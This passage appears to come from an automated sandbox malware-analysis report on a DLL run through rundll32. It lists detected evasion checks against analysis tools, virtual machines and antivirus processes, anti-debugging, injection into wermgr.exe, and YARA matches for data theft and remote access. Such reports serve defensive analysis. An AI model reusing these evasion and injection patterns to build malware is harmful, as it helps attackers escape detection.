Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.568896607.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.568896607.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.568896607.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: wermgr.exe, 0000001A.00000003.591280509.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600143641.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.591304574.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600296293.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.559657902.000000000436F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600190022.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.600018276.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599821146.0000000005330000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000001A.00000003.599845838.0000000005330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6636 Thread sleep count: 177 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 rdtsc 3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\wermgr.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADB883 GetSystemInfo, 20_2_00ADB883
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD9DA8 FindFirstFileW,FindNextFileW, 20_2_00AD9DA8
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.9.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: VMware7,1
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.me
Source: YWUEZVG8.htm.26.dr Binary or memory string: ;" aria-hidden="true" class="js-content-viewer rapidnofollow" tabindex="-1"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/GrbIGl3XT7cxPkRfHGfS9A--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/rollingstone.com/1559327ca430d396aaa47b044ff6e77a.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px) Ov(h)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4px) Mend(9px) Lh(1) C($cat-politics)" data-test-locator="stream-item-category-label">Politics</div><div class="C($streamItemGray) Fz(12px) D(ib) Mb(4px) Lh(1)" id="stream-item-publisher_6" data-test-locator="stream-item-publisher">Rolling Stone</div><h3 class="LineClamp(2,2.6em) Mb(4px) Mb(0)--md1160 Mt(0) Lh(1.3) Fz(19px) stream-item-title" data-test-locator="stream-item-title"><a class="js-content-viewer rapidnofollow wafer-caas D(b) Td(n) Td(n):f C(--cobalt) C(--dory):h" data-uuid="a30448d9-3077-3ca5-a6b7-fbb569663620" href="/entertainment/trump-promises-violate-14th-amendment-193116065.html" data-ylk="itc:0;elm:hdln;elmt:ct;bpos:1;cpos:6;cposy:17;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:story;g:a30448d9-3077-3ca5-a6b7-fbb569663620;grpt:storyCluster;pkgt:cluster_all_img;pos:1;cnt_tpc:Politics;slk:Trump Promises to Violate 14th Amendment
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 Start: 10035315 End: 1003515E 3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress, 3_2_1001F523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035030 rdtsc 3_2_10035030
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001E0D9 mov eax, dword ptr fs:[00000030h] 3_2_1001E0D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_3_00AC2297 mov eax, dword ptr fs:[00000030h] 20_3_00AC2297
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD1015 mov eax, dword ptr fs:[00000030h] 20_2_00AD1015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD21CD mov eax, dword ptr fs:[00000030h] 20_2_00AD21CD
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 190000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 160000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: D03C50 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 160000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 190000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: 160000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1008DB50 cpuid 3_2_1008DB50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100A0AD0 GetCurrentThread,GetThreadTimes,GetSystemTimeAsFileTime,QueryPerformanceFrequency,QueryPerformanceCounter,GetCurrentProcess,GetProcessTimes,_errno,GetModuleHandleA,GetProcAddress, 3_2_100A0AD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10092180 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress, 3_2_10092180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADBB4D GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW, 20_2_00ADBB4D
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000014.00000003.549554692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.561029904.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.561647699.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.5f1170.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.561029904.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.561647699.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs